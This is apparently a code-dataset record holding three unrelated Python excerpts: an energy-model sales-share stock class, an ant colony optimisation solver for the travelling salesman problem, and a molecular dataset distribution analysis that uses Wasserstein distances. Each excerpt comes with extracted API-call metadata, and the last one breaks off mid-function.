ref_sums = np.sum(ss_array, axis=1)
# ignore where no reference is specified to avoid dividing by zero
vintage_no_ref, retiring_no_ref = np.nonzero(ref_sums)
factors = np.zeros(np.shape(ref_sums))
factors[vintage_no_ref, retiring_no_ref] += space_for_reference[vintage_no_ref, retiring_no_ref] / ref_sums[
vintage_no_ref, retiring_no_ref]
factors = np.reshape(np.repeat(factors, num_techs, axis=0), (num_years, num_techs, num_techs))
# gross up reference sales share with the need
return ss_array * factors
@staticmethod
def normalize_array(ss_array, retiring_must_have_replacement=True):
# Normalize to 1
sums = np.sum(ss_array, axis=1)
if np.any(sums == 0) and retiring_must_have_replacement:
raise ValueError('Every retiring technology must have a replacement specified in sales share')
# indicies needing scaling
vintage, retiring = np.nonzero(sums != 1)
# normalize all to 1
ss_array[vintage, :, retiring] = (ss_array[vintage, :, retiring].T / sums[vintage, retiring]).T
return ss_array
@staticmethod
def cap_array_at_1(ss_array):
# Normalize down to 1
sums = np.sum(ss_array, axis=1)
vintage, retiring = np.nonzero(sums > 1)
# normalize those greater than 1
ss_array[vintage, :, retiring] = (ss_array[vintage, :, retiring].T / sums[vintage, retiring]).T
return ss_array
class SupplySpecifiedStock(SpecifiedStock):
def __init__(self, id, sql_id_table, sql_data_table, scenario):
SpecifiedStock.__init__(self, id, sql_id_table, sql_data_table, scenario)
def convert(self):
"""
convert values to model currency and capacity (energy_unit/time_step)
"""
if self.values is not None:
model_energy_unit = cfg.calculation_energy_unit
model_time_step = cfg.cfgfile.get('case', 'time_step')
if self.time_unit is not None:
self.values = util.unit_convert(self.values, unit_from_num=self.capacity_or_energy_unit,
unit_from_den=self.time_unit, unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
else:
self.values = util.unit_convert(self.values, unit_from_num=cfg.ureg.Quantity(self.capacity_or_energy_unit)
* cfg.ureg.Quantity(model_time_step),
unit_from_den = model_time_step,
unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
|
[
"datamapfunctions.DataMapFunctions.__init__",
"numpy.repeat",
"shared_classes.SpecifiedStock.__init__",
"numpy.any",
"util.expand_multi",
"numpy.sum",
"shared_classes.StockItem.__init__",
"util.remove_df_levels",
"datamapfunctions.Abstract.__init__",
"util.unit_convert",
"numpy.nonzero",
"util.object_att_from_table",
"config.ureg.Quantity",
"config.cfgfile.get",
"numpy.shape",
"shared_classes.Stock.__init__"
] |
[((458, 590), 'shared_classes.Stock.__init__', 'Stock.__init__', (['self', 'id', 'drivers'], {'sql_id_table': '"""SupplyStock"""', 'sql_data_table': '"""SupplyStockData"""', 'primary_key': '"""node_id"""'}), "(self, id, drivers, sql_id_table='SupplyStock',\n sql_data_table='SupplyStockData', primary_key='node_id', **kwargs)\n", (472, 590), False, 'from shared_classes import Stock, StockItem, SpecifiedStock\n'), ((616, 640), 'shared_classes.StockItem.__init__', 'StockItem.__init__', (['self'], {}), '(self)\n', (634, 640), False, 'from shared_classes import Stock, StockItem, SpecifiedStock\n'), ((2234, 2270), 'config.cfgfile.get', 'cfg.cfgfile.get', (['"""case"""', '"""time_step"""'], {}), "('case', 'time_step')\n", (2249, 2270), True, 'import config as cfg\n'), ((6446, 6464), 'numpy.shape', 'np.shape', (['ss_array'], {}), '(ss_array)\n', (6454, 6464), True, 'import numpy as np\n'), ((6485, 6509), 'numpy.sum', 'np.sum', (['ss_array'], {'axis': '(1)'}), '(ss_array, axis=1)\n', (6491, 6509), True, 'import numpy as np\n'), ((6628, 6648), 'numpy.nonzero', 'np.nonzero', (['ref_sums'], {}), '(ref_sums)\n', (6638, 6648), True, 'import numpy as np\n'), ((7184, 7208), 'numpy.sum', 'np.sum', (['ss_array'], {'axis': '(1)'}), '(ss_array, axis=1)\n', (7190, 7208), True, 'import numpy as np\n'), ((7446, 7467), 'numpy.nonzero', 'np.nonzero', (['(sums != 1)'], {}), '(sums != 1)\n', (7456, 7467), True, 'import numpy as np\n'), ((7724, 7748), 'numpy.sum', 'np.sum', (['ss_array'], {'axis': '(1)'}), '(ss_array, axis=1)\n', (7730, 7748), True, 'import numpy as np\n'), ((7777, 7797), 'numpy.nonzero', 'np.nonzero', (['(sums > 1)'], {}), '(sums > 1)\n', (7787, 7797), True, 'import numpy as np\n'), ((8088, 8161), 'shared_classes.SpecifiedStock.__init__', 'SpecifiedStock.__init__', (['self', 'id', 'sql_id_table', 'sql_data_table', 'scenario'], {}), '(self, id, sql_id_table, sql_data_table, scenario)\n', (8111, 8161), False, 'from shared_classes import Stock, StockItem, SpecifiedStock\n'), ((1250, 1329), 'util.object_att_from_table', 'util.object_att_from_table', (['self.sql_id_table', 'self.supply_node_id', 'primary_key'], {}), '(self.sql_id_table, self.supply_node_id, primary_key)\n', (1276, 1329), False, 'import util\n'), ((1383, 1427), 'datamapfunctions.DataMapFunctions.__init__', 'DataMapFunctions.__init__', (['self', 'data_id_key'], {}), '(self, data_id_key)\n', (1408, 1427), False, 'from datamapfunctions import DataMapFunctions, Abstract\n'), ((1532, 1591), 'util.remove_df_levels', 'util.remove_df_levels', (['self.raw_values', '"""supply_technology"""'], {}), "(self.raw_values, 'supply_technology')\n", (1553, 1591), False, 'import util\n'), ((1693, 1780), 'datamapfunctions.Abstract.__init__', 'Abstract.__init__', (['self', 'self.id'], {'primary_key': 'primary_key', 'data_id_key': 'data_id_key'}), '(self, self.id, primary_key=primary_key, data_id_key=\n data_id_key)\n', (1710, 1780), False, 'from datamapfunctions import DataMapFunctions, Abstract\n'), ((2434, 2606), 'util.unit_convert', 'util.unit_convert', (['self.values'], {'unit_from_num': 'self.capacity_or_energy_unit', 'unit_from_den': 'self.time_unit', 'unit_to_num': 'model_energy_unit', 'unit_to_den': 'model_time_step'}), '(self.values, unit_from_num=self.capacity_or_energy_unit,\n unit_from_den=self.time_unit, unit_to_num=model_energy_unit,\n unit_to_den=model_time_step)\n', (2451, 2606), False, 'import util\n'), ((4308, 4387), 'util.object_att_from_table', 'util.object_att_from_table', (['self.sql_id_table', 'self.supply_node_id', 'primary_key'], {}), '(self.sql_id_table, self.supply_node_id, primary_key)\n', (4334, 4387), False, 'import util\n'), ((4481, 4525), 'datamapfunctions.DataMapFunctions.__init__', 'DataMapFunctions.__init__', (['self', 'data_id_key'], {}), '(self, data_id_key)\n', (4506, 4525), False, 'from datamapfunctions import DataMapFunctions, Abstract\n'), ((4630, 4706), 'util.remove_df_levels', 'util.remove_df_levels', (['self.raw_values', "['supply_node', 'supply_technology']"], {}), "(self.raw_values, ['supply_node', 'supply_technology'])\n", (4651, 4706), False, 'import util\n'), ((4814, 4901), 'datamapfunctions.Abstract.__init__', 'Abstract.__init__', (['self', 'self.id'], {'primary_key': 'primary_key', 'data_id_key': 'data_id_key'}), '(self, self.id, primary_key=primary_key, data_id_key=\n data_id_key)\n', (4831, 4901), False, 'from datamapfunctions import DataMapFunctions, Abstract\n'), ((6677, 6695), 'numpy.shape', 'np.shape', (['ref_sums'], {}), '(ref_sums)\n', (6685, 6695), True, 'import numpy as np\n'), ((6889, 6926), 'numpy.repeat', 'np.repeat', (['factors', 'num_techs'], {'axis': '(0)'}), '(factors, num_techs, axis=0)\n', (6898, 6926), True, 'import numpy as np\n'), ((7221, 7238), 'numpy.any', 'np.any', (['(sums == 0)'], {}), '(sums == 0)\n', (7227, 7238), True, 'import numpy as np\n'), ((8422, 8458), 'config.cfgfile.get', 'cfg.cfgfile.get', (['"""case"""', '"""time_step"""'], {}), "('case', 'time_step')\n", (8437, 8458), True, 'import config as cfg\n'), ((3687, 3764), 'util.expand_multi', 'util.expand_multi', (['self.values', 'needed_sales_share_levels', 'needed_sales_names'], {}), '(self.values, needed_sales_share_levels, needed_sales_names)\n', (3704, 3764), False, 'import util\n'), ((8532, 8704), 'util.unit_convert', 'util.unit_convert', (['self.values'], {'unit_from_num': 'self.capacity_or_energy_unit', 'unit_from_den': 'self.time_unit', 'unit_to_num': 'model_energy_unit', 'unit_to_den': 'model_time_step'}), '(self.values, unit_from_num=self.capacity_or_energy_unit,\n unit_from_den=self.time_unit, unit_to_num=model_energy_unit,\n unit_to_den=model_time_step)\n', (8549, 8704), False, 'import util\n'), ((5515, 5602), 'util.expand_multi', 'util.expand_multi', (['self.values', 'needed_sales_share_levels', 'needed_sales_share_names'], {}), '(self.values, needed_sales_share_levels,\n needed_sales_share_names)\n', (5532, 5602), False, 'import util\n'), ((2888, 2935), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['self.capacity_or_energy_unit'], {}), '(self.capacity_or_energy_unit)\n', (2905, 2935), True, 'import config as cfg\n'), ((3013, 3047), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['model_time_step'], {}), '(model_time_step)\n', (3030, 3047), True, 'import config as cfg\n'), ((8877, 8924), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['self.capacity_or_energy_unit'], {}), '(self.capacity_or_energy_unit)\n', (8894, 8924), True, 'import config as cfg\n'), ((9002, 9036), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['model_time_step'], {}), '(model_time_step)\n', (9019, 9036), True, 'import config as cfg\n')]
|
import numpy as np
import networkx as nx
import argparse
import random
from models.distance import get_dist_func
def get_fitness(solution, initial_node, node_list):
"""
Get fitness of solution encoded by permutation.
Args:
solution (numpy.ndarray): Solution encoded as a permutation
initial_node (int): Initial node in the permutation (equal to the first element - redundant)
node_list (list): List of node IDs in network
Returns:
(float): Fitness of specified solution
"""
# Append path back to initial node.
solution_aux = np.hstack((solution, initial_node))
# Compute fitness.
return np.sum([dist_func(node_list[el[0]], node_list[el[1]])
for el in [(solution_aux[idx], solution_aux[idx+1])
for idx in range(len(solution_aux)-1)]])
def get_inv_dist_mat(node_list):
"""
Get pairwise distance matrix for specified nodes in node list.
Args:
node_list (list): Nodes for which to compute the pairwise distances
Returns:
(numpy.ndarray): Matrix of pairwise distances
"""
# Initialize array.
dist_mat = np.zeros((len(node_list), len(node_list)), dtype=float)
# Compute pairwise distances
for idx1 in range(len(node_list)-1):
for idx2 in range(idx1+1, len(node_list)):
dist_mat[idx1, idx2] = dist_mat[idx2, idx1] = 1/dist_func(node_list[idx1], node_list[idx2])
# Return computed distance matrix.
return dist_mat
def aco(network, n_ants=100, max_it=500, rho=0.1, alpha=1.0, beta=1.0, q=1.0,
aug='relinking', p_mut=0.08, p_accept_worse=0.1, breeding_coeff=0.5):
"""
Perform ant colony optimization to estimate solution for travelling salesman problem.
Args:
network (object): Networkx representation of the graph
n_ants (int): Number of ants to use
max_it (int): Maximum number of iterations to perform
rho (float): Evaporation rate
alpha (float): Pheromone matrix power in transition probability matrix construction
beta (float): Inverse distance matrix power in transition probability matrix construction
q (float): Pheromone trail coefficient
aug (str): Algorithm augmentation to use. If None, use no augmentation. If equal to 'relinking' use path
relinking method. If equal to 'genetic' use replacement of worst ants with crossovers of best ants.
p_mut (float): Mutation probability
p_accept_worse (float): Probability of accepting a relinked solution that is worse than original.
breeding_coeff (float): Fraction of best ants to use in crossover and fraction of worst ants to
replace with offspring (genetic augmentation)
Returns:
(tuple): Best found solution, fitness of best solution, edgelists corresponding to solutions representing
the new global best solution.
"""
# Check aug parameter.
if aug is not None:
if aug not in {'relinking', 'genetic'}:
raise(ValueError('unknown value specified for aug parameter'))
# Initialize list for storing edge lists (for animating).
edgelists = []
# Initialize list of nodes (for converting enumerations to actual node IDs).
node_list = list(network.nodes())
# Set initial node.
initial_node = 0
# Initilize best found solution.
best_solution = {
'fitness' : np.inf,
'solution' : None
}
# Compute distance matrix for locations.
inv_dist_mat = get_inv_dist_mat(node_list)
# Initialize pheromone matrix.
pher_mat = 0.01*np.ones_like(inv_dist_mat, dtype=float)
# Initialize iteration index.
it_idx = 0
# Main iteration loop.
while it_idx < max_it:
# Increment iteration counter.
it_idx += 1
# Print iteration index and best fitness.
print('iteration: {0}'.format(it_idx))
print('best fitness: {0}'.format(best_solution['fitness']))
# Initialize array for storing ant solutions.
ant_solutions = np.empty((n_ants, len(node_list)), dtype=int)
# Initialize array for storing ant fitness values.
ant_fitness_vals = np.empty(n_ants, dtype=float)
# Build transition probability matrix.
p_mat = (pher_mat**alpha) * (inv_dist_mat**beta)
# Run ACO step.
for ant_idx in range(n_ants):
# Set initial node.
current_node = initial_node
# Get set of unvisited nodes.
unvisited = set(range(len(node_list)))
unvisited.remove(initial_node)
# Build ant's solution.
solution_nxt = np.empty(len(node_list), dtype=int)
solution_nxt[0] = initial_node
for step_idx in range(len(node_list) - 1):
unvisited_list = list(unvisited)
probs = p_mat[current_node, unvisited_list] / np.sum(p_mat[current_node, unvisited_list])
node_nxt = np.random.choice(unvisited_list, size=1, p=probs)[0]
unvisited.remove(node_nxt)
solution_nxt[step_idx+1] = node_nxt
current_node = node_nxt
# Compute fitness of solution and compare to global best.
fitness_solution = get_fitness(solution_nxt, initial_node, node_list)
ant_fitness_vals[ant_idx] = fitness_solution
if fitness_solution < best_solution['fitness']:
best_solution['fitness'] = fitness_solution
best_solution['solution'] = solution_nxt
solution_nxt_aug = np.hstack((solution_nxt, initial_node))
# Store edge list (for animating).
edgelists.append([(node_list[solution_nxt_aug[idx]], node_list[solution_nxt_aug[idx+1]])
for idx in range(len(solution_nxt_aug) - 1)])
# Store ant's solution.
ant_solutions[ant_idx, :] = solution_nxt
# Initialize matrix for accumulating pheromones (for pheromone update).
pher_add_mat = np.zeros_like(pher_mat, dtype=float)
if aug == 'relinking':
# If using relinking augmentation.
# Go over solutions.
for idx_solution in range(ant_solutions.shape[0]):
# Split solution at random point.
sec1, sec2 = np.split(ant_solutions[idx_solution], \
indices_or_sections=[np.random.randint(1, len(ant_solutions[idx_solution]))])
# Relink.
solution_mod = np.hstack((sec1, list(reversed(sec2))))
# Apply mutation with probability.
if np.random.rand() < p_mut:
p1 = np.random.randint(0, len(solution_mod))
p2 = np.random.randint(0, len(solution_mod))
solution_mod[[p1, p2]] = solution_mod[[p2, p1]]
# Compute fitness value of relinked solution.
fitness_mod = get_fitness(solution_mod, initial_node, node_list)
# If fitness better accept. Also accept with specified probability.
if (fitness_mod < ant_fitness_vals[idx_solution]) or (np.random.rand() < p_accept_worse):
ant_solutions[idx_solution, :] = solution_mod
ant_fitness_vals[idx_solution] = fitness_mod
if aug == 'genetic':
# If using genetic augmentation.
# Sort ants ant fitness values from best to worst.
p = ant_fitness_vals.argsort()
ant_fitness_vals = ant_fitness_vals[p]
ant_solutions = ant_solutions[p, :]
# Get number of new ants and initialize array for crossovers.
n_new_ants = int(np.ceil(breeding_coeff*ant_solutions.shape[0]))
ant_solutions_new = np.empty((n_new_ants, ant_solutions.shape[1]), dtype=int)
ant_fitness_vals_new = np.empty(ant_solutions_new.shape[0], dtype=float)
# Go over solutions for which to perform crossover.
for idx in range(0, ant_solutions_new.shape[0], 2):
# Get solutions and cut at random point.
ant_sol_1 = ant_solutions[idx, :]
ant_sol_2 = ant_solutions[idx+1, :]
c1 = ant_sol_1[:np.random.randint(1, len(ant_sol_1))]
c2 = ant_sol_2[:np.random.randint(1, len(ant_sol_2))]
# Append elements in second solution in order found.
offspring1 = np.hstack((c1, ant_sol_2[~np.in1d(ant_sol_2, c1)]))
offspring2 = np.hstack((c2, ant_sol_1[~np.in1d(ant_sol_1, c2)]))
# Apply mutations with specified probability.
if np.random.rand() < p_mut:
p1 = np.random.randint(0, len(offspring1))
p2 = np.random.randint(0, len(offspring1))
offspring1[[p1, p2]] = offspring1[[p2, p1]]
if np.random.rand() < p_mut:
p1 = np.random.randint(0, len(offspring2))
p2 = np.random.randint(0, len(offspring2))
offspring2[[p1, p2]] = offspring2[[p2, p1]]
# Set offspring and fitness values.
ant_solutions_new[idx, :] = offspring1
ant_solutions_new[idx+1, :] = offspring2
ant_fitness_vals_new[idx] = get_fitness(offspring1, initial_node, node_list)
ant_fitness_vals_new[idx+1] = get_fitness(offspring2, initial_node, node_list)
# Replace worst ants with offspring of best.
ant_solutions[-ant_solutions_new.shape[0]:] = ant_solutions_new
ant_fitness_vals[-len(ant_fitness_vals_new):] = ant_fitness_vals_new
# Compute and print diversity of solutions.
diversity = (np.mean(ant_fitness_vals) - np.min(ant_fitness_vals))/(np.max(ant_fitness_vals) - np.min(ant_fitness_vals))
print(diversity)
# Add pheromones to pheromone accumulation matrix (for next iteration).
for idx_sol, solution in enumerate(ant_solutions):
for idx in range(len(solution)-1):
pher_add_mat[solution[idx], solution[idx+1]] += q*(1/ant_fitness_vals[idx_sol])
pher_add_mat[solution[idx+1], solution[idx]] += q*(1/ant_fitness_vals[idx_sol])
# Update pheromone matrix.
pher_mat = (1-rho)*pher_mat + pher_add_mat
# Return best found solution, fitness value of best found solution and edgelist of network states
# corresponding to global best position updates.
return best_solution['solution'], best_solution['fitness'], edgelists
if __name__ == '__main__':
### PARSE ARGUMENTS ###
parser = argparse.ArgumentParser(description='Approximate solution to TSP using ant colony optimization.')
parser.add_argument('--num-nodes', type=int, default=50, help='Number of nodes to use')
parser.add_argument('--dist-func', type=str, default='geodesic', choices=['geodesic', 'learned'],
help='Distance function to use')
parser.add_argument('--prediction-model', type=str, default='gboosting', choices=['gboosting', 'rf'],
help='Prediction model to use for learned distance function')
parser.add_argument('--max-it', type=int, default=100, help='Maximum iterations to perform')
parser.add_argument('--n-ants', type=int, default=100, help='Number of ants to use')
parser.add_argument('--rho', type=float, default=0.1, help='Evaporation rate parameter')
parser.add_argument('--alpha', type=float, default=1.0, help='Alpha parameter in transition probability matrix update')
parser.add_argument('--beta', type=float, default=1.0, help='Beta parameter in transition probability matrix update')
parser.add_argument('--q', type=float, default=1.0, help='Pheromone update coefficient')
parser.add_argument('--aug', type=str, default=None, choices=['relinking', 'genetic'], help='Augmentation to use')
parser.add_argument('--p-mut', type=float, default=0.08, help='Mutation rate (augmentation)')
parser.add_argument('--p-accept-worse', type=float, default=0.08,
help='Probability of accepting a worse result of relinking (relinking augmentation)')
parser.add_argument('--breeding-coeff', type=float, default=0.5,
help='Fraction of best solution for which to perform crossover and fraction of worst solution to replace by offspring (genetic augmentation)')
args = parser.parse_args()
#######################
# Parse problem network.
network = nx.read_gpickle('./data/grid_data/grid_network.gpickle')
# Number of nodes to remove from network.
to_remove = network.number_of_nodes() - args.num_nodes
# Remove randomly sampled nodes to get specified number of nodes.
network.remove_nodes_from(random.sample(list(network.nodes), to_remove))
# Get distance function.
dist_func = get_dist_func(network, which=args.dist_func, prediction_model=args.prediction_model)
# Get solution using ant colony optimization.
solution_position, solution_fitness, edgelists = aco(network, n_ants=args.n_ants, max_it=args.max_it, rho=args.rho,
alpha=args.alpha, beta=args.beta, q=args.q, aug=args.aug, p_mut=args.p_mut,
p_accept_worse=args.p_accept_worse, breeding_coeff=args.breeding_coeff)
# Save list of edge lists for animation.
np.save('./results/edgelists/edgelist_tsp_ac.npy', list(map(np.vstack, edgelists)))
nx.write_gpickle(network, './results/networks/network_tsp_ac.gpickle')
# Print best solution fitness.
print('Fitness of best found solution: {0:.3f}'.format(solution_fitness))
|
[
"numpy.ones_like",
"numpy.ceil",
"numpy.mean",
"numpy.random.rand",
"argparse.ArgumentParser",
"numpy.hstack",
"numpy.random.choice",
"numpy.in1d",
"models.distance.get_dist_func",
"numpy.max",
"numpy.sum",
"numpy.empty",
"numpy.min",
"networkx.read_gpickle",
"numpy.zeros_like",
"networkx.write_gpickle"
] |
[((601, 636), 'numpy.hstack', 'np.hstack', (['(solution, initial_node)'], {}), '((solution, initial_node))\n', (610, 636), True, 'import numpy as np\n'), ((10915, 11017), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Approximate solution to TSP using ant colony optimization."""'}), "(description=\n 'Approximate solution to TSP using ant colony optimization.')\n", (10938, 11017), False, 'import argparse\n'), ((12770, 12826), 'networkx.read_gpickle', 'nx.read_gpickle', (['"""./data/grid_data/grid_network.gpickle"""'], {}), "('./data/grid_data/grid_network.gpickle')\n", (12785, 12826), True, 'import networkx as nx\n'), ((13135, 13224), 'models.distance.get_dist_func', 'get_dist_func', (['network'], {'which': 'args.dist_func', 'prediction_model': 'args.prediction_model'}), '(network, which=args.dist_func, prediction_model=args.\n prediction_model)\n', (13148, 13224), False, 'from models.distance import get_dist_func\n'), ((13703, 13773), 'networkx.write_gpickle', 'nx.write_gpickle', (['network', '"""./results/networks/network_tsp_ac.gpickle"""'], {}), "(network, './results/networks/network_tsp_ac.gpickle')\n", (13719, 13773), True, 'import networkx as nx\n'), ((3643, 3682), 'numpy.ones_like', 'np.ones_like', (['inv_dist_mat'], {'dtype': 'float'}), '(inv_dist_mat, dtype=float)\n', (3655, 3682), True, 'import numpy as np\n'), ((4238, 4267), 'numpy.empty', 'np.empty', (['n_ants'], {'dtype': 'float'}), '(n_ants, dtype=float)\n', (4246, 4267), True, 'import numpy as np\n'), ((6160, 6196), 'numpy.zeros_like', 'np.zeros_like', (['pher_mat'], {'dtype': 'float'}), '(pher_mat, dtype=float)\n', (6173, 6196), True, 'import numpy as np\n'), ((7969, 8026), 'numpy.empty', 'np.empty', (['(n_new_ants, ant_solutions.shape[1])'], {'dtype': 'int'}), '((n_new_ants, ant_solutions.shape[1]), dtype=int)\n', (7977, 8026), True, 'import numpy as np\n'), ((8062, 8111), 'numpy.empty', 'np.empty', (['ant_solutions_new.shape[0]'], {'dtype': 'float'}), '(ant_solutions_new.shape[0], dtype=float)\n', (8070, 8111), True, 'import numpy as np\n'), ((5669, 5708), 'numpy.hstack', 'np.hstack', (['(solution_nxt, initial_node)'], {}), '((solution_nxt, initial_node))\n', (5678, 5708), True, 'import numpy as np\n'), ((7889, 7937), 'numpy.ceil', 'np.ceil', (['(breeding_coeff * ant_solutions.shape[0])'], {}), '(breeding_coeff * ant_solutions.shape[0])\n', (7896, 7937), True, 'import numpy as np\n'), ((10001, 10026), 'numpy.mean', 'np.mean', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10008, 10026), True, 'import numpy as np\n'), ((10029, 10053), 'numpy.min', 'np.min', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10035, 10053), True, 'import numpy as np\n'), ((10056, 10080), 'numpy.max', 'np.max', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10062, 10080), True, 'import numpy as np\n'), ((10083, 10107), 'numpy.min', 'np.min', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10089, 10107), True, 'import numpy as np\n'), ((4975, 5018), 'numpy.sum', 'np.sum', (['p_mat[current_node, unvisited_list]'], {}), '(p_mat[current_node, unvisited_list])\n', (4981, 5018), True, 'import numpy as np\n'), ((5046, 5095), 'numpy.random.choice', 'np.random.choice', (['unvisited_list'], {'size': '(1)', 'p': 'probs'}), '(unvisited_list, size=1, p=probs)\n', (5062, 5095), True, 'import numpy as np\n'), ((6773, 6789), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (6787, 6789), True, 'import numpy as np\n'), ((8871, 8887), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (8885, 8887), True, 'import numpy as np\n'), ((9106, 9122), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (9120, 9122), True, 'import numpy as np\n'), ((7312, 7328), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (7326, 7328), True, 'import numpy as np\n'), ((8682, 8704), 'numpy.in1d', 'np.in1d', (['ant_sol_2', 'c1'], {}), '(ant_sol_2, c1)\n', (8689, 8704), True, 'import numpy as np\n'), ((8763, 8785), 'numpy.in1d', 'np.in1d', (['ant_sol_1', 'c2'], {}), '(ant_sol_1, c2)\n', (8770, 8785), True, 'import numpy as np\n')]
|
'''
Analytic Hierarchy Process, AHP.
Base on Wasserstein distance
'''
from scipy.stats import wasserstein_distance
from sklearn.decomposition import PCA
import scipy
import numpy as np
import pandas as pd
import sys
import argparse
import os
import glob
import datasets_analysis_module as dam
class idx_analysis(object):
def __init__(self):
self.all_distribution_idx = {
'c': 0, 'C': 1, '(': 2, ')': 3, '1': 4, 'O': 5, '=': 6, '2': 7, 'N': 8, 'n': 9,
'3': 10, '[': 11, ']': 12, '@': 13, 'H': 14, 'F': 15, '-': 16, '4': 17, 'S': 18, 'Cl': 19,
'/': 20, 's': 21, 'o': 22, '.': 23, 'Br': 24, '5': 25, '+': 26, '#': 27, '\\': 28, '6': 29,
'I': 30, 'P': 31, 'Si': 32, '7': 33, '8': 34, 'B': 35, '%': 36, 'Na': 37, '9': 38, '0': 39,
'K': 40, 'Sn': 41, 'Se': 42, 'Li': 43, 'Zn': 44, 'Al': 45, 'b': 46, 'As': 47, 'Mg': 48, 'p': 49,
'Ca': 50, 'se': 51, 'Ag': 52, 'Te': 53, 'Ba': 54, 'Bi': 55, 'Rb': 56, 'Cs': 57, 'Sr': 58, 'te': 59,
'Be': 60, 'length': 61, 'symbol_type': 62
}
self.all_distribution_idx_reversed = {v: k for k, v in self.all_distribution_idx.items()}
def wasserstein_dis(distr_dict_0, distr_dict_1, dis_type='wasserstein'):
minus = 1e-15
sorted_keys_0 = np.sort(list(distr_dict_0.keys()))
max_value_0 = max(distr_dict_0.values())
values_0 = minus + np.array([distr_dict_0[k] for k in sorted_keys_0])/max_value_0
sorted_keys_1 = np.sort(list(distr_dict_1.keys()))
max_value_1 = max(distr_dict_1.values())
values_1 = minus + np.array([distr_dict_1[k] for k in sorted_keys_1])/max_value_1
if dis_type == 'wasserstein':
w_dis = wasserstein_distance(values_0, values_1)
elif dis_type == 'KL':
w_dis = np.mean(scipy.special.kl_div(values_0, values_1))
else:
w_dis = np.linalg.norm(np.array(values_0) - np.array(values_1))
return np.round(w_dis, 4)
def datasets_pair_analysis(
target_set_distribution,
pretrain_sets_distribution_path='PretrainedSetsDistribution.npy'
):
if not os.path.exists(pretrain_sets_distribution_path):
print(pretrain_sets_distribution_path, 'not the right file.')
print('PretrainedSetsDistribution.npy can not be found')
pretrained_sets_distribution = np.load(pretrain_sets_distribution_path, allow_pickle=True).item()
three_sets_prefix = ['c', 'cp', 'cpz']
all_wd_values = {k: {} for k in three_sets_prefix}
for i, prefix in enumerate(three_sets_prefix):
for j in range(63):
prefix_name = f"{prefix}-{j}"
all_wd_values[prefix][j] = wasserstein_dis(
target_set_distribution[str(j)],
pretrained_sets_distribution[prefix_name]
)
return all_wd_values
def rerange_distribution(target, combined_result):
distribute_dict = {}
if target == 'length':
min_len, max_len = 1, 256
distribute_dict = {k: 0 for k in range(min_len, max_len+1)}
for k, v in combined_result.items():
if k <= min_len:
distribute_dict[min_len] += v
elif k > min_len and k < max_len:
distribute_dict[k] = v
elif k >= max_len:
distribute_dict[max_len] += v
else:
print('Unexpected key from combined_result.(target: length)')
elif target == 'symbol_type':
min_len, max_len = 1, 61
distribute_dict = {k: 0 for k in range(min_len, max_len+1)}
for k, v in combined_result.items():
if k <= min_len:
distribute_dict[min_len] += v
elif k > min_len and k < max_len:
distribute_dict[k] = v
elif k >= max_len:
distribute_dict[max_len] += v
else:
print('Unexpected key from combined_result.(target: symbol_type)')
else:
distribute_dict = {k: 0 for k in [np.round(w, 2) for w in np.arange(0.0, 1.001, 0.01)]}
for k, v in combined_result.items():
if k in distribute_dict:
distribute_dict[k] += v
else:
print('Unexpected key {:s} from combined_result.(consider_symbol {:s})'.format(str(k), target))
return distribute_dict
def linear_ridgeclassifier(x, y):
from sklearn import linear_model
cla = linear_model.RidgeClassifier()
cla.fit(x, y)
return cla.score(x, y), cla.intercept_, cla
def data_norm(*args):
assert len(args) > 0, "Datasets' length needs > 0"
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(np.vstack(args))
norm_args = [scaler.transform(args[i]) for i in range(len(args))]
norm_args = norm_args if len(args) > 1 else norm_args[0]
return norm_args
def main_get_dis_customized_dataset(file='./temp_data/bbbp.smi', num_workers=1):
# savename = 'wasserstein_temp.csv'
dataname = os.path.split(file)[-1].split('.')[0]
ahp = idx_analysis()
all_features = []
target_set_distribution = {}
for k, v in ahp.all_distribution_idx.items():
ta = dam.target_analysis(k)
if k == 'length':
specific_func = ta.length_analysis
elif k == 'symbol_type':
specific_func = ta.symbol_type_analysis
else:
specific_func = ta.symbol_analysis
combined_result = dam.parallel_operation(file, num_workers, specific_func)
distribute_dict = rerange_distribution(k, combined_result)
target_set_distribution[str(v)] = distribute_dict
all_wd_values = datasets_pair_analysis(
target_set_distribution,
pretrain_sets_distribution_path='PretrainedSetsDistribution.npy',
)
# 3 to 1
for nd, (k, wd_dict) in enumerate(all_wd_values.items()):
all_features.append(list(wd_dict.values()))
final_features = pd.DataFrame(
np.reshape(all_features, [1, 63*3]), # (all_features),
index=[dataname],
columns=list(range(63*3)),
)
# final_features.to_csv(savename)
return final_features
def main_L2L(args):
filename = './wasserstein.csv' # This file contains the features used to train the decision model.
if not os.path.exists(filename):
print('No wasserstein.csv exists')
data_df = pd.read_csv(filename, header=0, index_col=0)
label = data_df['label'].values
features = data_df[[str(i) for i in range(np.shape(data_df.values)[-1]-1)]].values
# print(features.shape)
customized_dataset_feature = main_get_dis_customized_dataset(
file=args.input_dataset, num_workers=args.num_workers).values
all_features = np.vstack([features, customized_dataset_feature])
norm_all_features = data_norm(all_features)
features = norm_all_features[0: -1, :]
customized_dataset_feature = norm_all_features[-1, :]
all_score = []
all_inter = []
flag = 1
for redu_i in range(1, np.shape(features)[0]+1):
reducer = PCA(n_components=redu_i)
features_ = reducer.fit_transform(features)
score, inter_, model = linear_ridgeclassifier(features_, label)
all_score.append(score)
all_inter.append(inter_[0])
# print(redu_i, score)
if score - 1 == 0 and flag == 1:
customized_dataset_feature_ = reducer.transform(customized_dataset_feature[None, :])
get_scores = model.decision_function(customized_dataset_feature_)
# print(model.decision_function(features_))
flag = 0
# print(all_score)
# print(all_inter)
select_models = {0: 'model_chembl27', 1: 'model_chembl27_pubchem', 2: 'model_chembl27_pubchem_zinc'}
